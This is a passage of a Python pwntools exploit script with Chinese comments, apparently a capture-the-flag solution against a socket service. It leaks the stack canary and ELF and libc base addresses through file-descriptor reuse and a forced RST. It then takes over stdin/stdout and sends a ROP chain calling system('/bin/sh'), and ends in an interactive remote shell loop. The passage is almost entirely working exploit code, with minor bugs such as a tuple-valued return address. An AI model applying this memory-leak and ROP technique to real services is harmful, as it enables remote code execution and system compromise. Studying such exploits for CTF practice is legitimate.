  time.sleep(0.1)
  # stop("get a new fd")
 
  # fd=4 被重用: 用来接收 Leak
  s4 = start_con()
  time.sleep(0.1)

  VIO_TEXT("Triggering leak via s4...")
  s4.send(p64(0x100))
  s4.send(b"\x00" * 0x7C + p32(1))
  time.sleep(0.25)

  # 2. 触发 RST 以激活漏洞/错误路径
  # 这里设置SOLSOCKET为SO_LINGER 并关闭 s1,会导致发送 RST 包
  # l_onoff = 1
  # l_linger = 0
  # 这里可以写struct.pack("ii", l_onoff, l_linger) 在64位机器上通常是 8 字节,符合 p32(1)+p32(0)
  s1.sock.setsockopt(
    socket.SOL_SOCKET, socket.SO_LINGER,p32(1)+p32(0) 
  )
  s1.sock.close()
  CLEAR_TEXT("s1 closed with RST")

  # 3. 接收并解析 Leak 数据
  # 服务端会将栈上0x100字节数据发送回来,其中包含了 Canary 和 libc 地址
  try:
    leak_data = s4.recv(0x100)
   
  #  stop("fd 4-->1")
    if len(leak_data) < 0x90:
      log.error(f"Leak failed, received len: {len(leak_data)}")
      return

    canary = u64(leak_data[0x48:0x50])
    CLEAR_TEXT(f"Canary: {hex(canary)}")
   
    elf_base = u64(leak_data[0x58:0x60]) - 0x147e
    CLEAR_TEXT(f"ELF Base: {hex(elf_base)}")

    libc_base = u64(leak_data[0x88:0x90]) - 0x9c720 - 900
    CLEAR_TEXT(f"Libc Base: {hex(libc_base)}")
    libc.address = libc_base

  except EOFError:
    log.error("Unexpected EOF during leak")
    return

  # 4. Get Shell 
  # 通过覆盖实现 关闭 fd 0 和 1 
  s_temp = start_con()
  s_temp.send(p64(0x100))
  s_temp.send(b"\x00"*0x7c + p32(0))
  time.sleep(0.1)
  s_temp.close() # 保持连接

  s_temp2 = start_con()
  s_temp2.send(p64(0x100))
  s_temp2.send(b"\x00"*0x7c + p32(1))
  time.sleep(0.1)
  s_temp2.close()

  # 服务端重新accept了连接分配到了 fd=0, fd=1
  # 这样我们就能控制 stdin/stdout
  ret_addr=elf_base+0x101a,
  stdin_sock = start_con() 
  stdout_sock = start_con() 
 
  VIO_TEXT("Sending ROP chain...")
 
  payload = b"A" * 0x48
  payload += flat([
    canary,
    0xdeadbeef,
    libc.search(asm('pop rdi; ret')).__next__(), 
    libc.search(b"/bin/sh").__next__(),
    ret_addr,
    libc.sym['system']
  ])
  stdin_sock.send(p64(len(payload)))
  time.sleep(0.1)
  stdin_sock.send(payload)
 
  time.sleep(0.1)
  stdin_sock.sendline(b"ls")
  print(stdout_sock.recv(4096))
  def listner():
    while True:
        try:
            print("\n")
            data = stdout_sock.recv(4096)
            if data:
                sys.stdout.buffer.write(data)
                sys.stdout.flush()
        except exception:
            pass 
  t=threading.Thread(target=listner,daemon=True)
  t.start()
  while True:
    cmd = input("[nan0in27 sh]$ ")
    stdin_sock.sendline(cmd.encode())
  #   print(stdout_sock.recv().decode(errors='ignore'))

if __name__ == "__main__":
  main()

still in updating